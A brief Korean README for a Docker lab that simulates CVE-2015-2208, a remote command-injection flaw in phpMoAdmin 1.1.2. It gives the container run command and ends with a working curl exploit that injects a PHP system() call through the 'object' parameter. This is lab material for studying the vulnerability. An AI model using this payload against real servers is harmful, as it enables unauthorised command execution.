
Docker에서 cve-2015-2208 취약점을 시뮬레이션
#CVE-2015-2208 환경을 시뮬레이션하기 위한 Dockerfile#
phpMoAdmin 1.1.2의 moadmin.php에 있는 saveObject 함수는 object 매개변수의 셸 메타문자를 통해 원격 공격자가 임의의 명령을 실행하도록 허용합니다.
발견자: @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio
참고 자료:
##테스트 환경##
sudo docker run -d -p 8888:80 ptantiku/cve-2015-2208
##익스플로잇##
curl http://localhost:8888/moadmin.php -d 'object=1;system("id");'